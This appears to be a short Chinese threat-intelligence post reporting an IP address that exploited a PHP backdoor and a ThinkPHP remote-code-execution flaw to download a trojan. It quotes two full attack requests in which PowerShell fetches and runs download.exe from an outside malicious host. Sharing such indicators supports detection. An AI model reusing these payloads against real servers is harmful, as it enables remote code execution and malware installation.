入侵
一个僵尸IP
xt2000 2020-02-12 20:46:31 468人浏览

发现来自江苏的ip  112.25.224.2 在利用php后门进行下载木马行为

GET/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fk.openyourass.xyz/download.exe','dSystemRoots/Temp/yvyjzffsgzfybai28624.exe');start )SystemRootS/Temp/yvyjzffsgzfybai28624.exe   HTTP/1.1

  • Connection: Keep-Alive
  • Accept: */*
  • Accept-Language: zh-cn

  • User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)

下载木马的服务器地址为fk.openyourass.xyz   文件为http://fk.openyourass.xyz/download.exe  

也会利用thinkphp漏洞来下载

GET/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fk.openyourass.xyz/download.exe','dSystemRoots/Temp/yvyjzffsgzfybai28624.exe');start )SystemRootS/Temp/yvyjzffsgzfybai28624.exe  

ip地址(1) 威胁情报数目 开放端口 所属域名 相关样本 微步标签 < 1/1 >
域名(1) 威胁情报数目 子域名 历史指向ip 相关样本 微步标签 < 1/1 >
匿名用户 2020-02-13 09:38:40 回复
可能被bulehero感染了
匿名用户 2020-02-12 21:22:20 回复
被bulehero感染了
奖励计划banner
今日推荐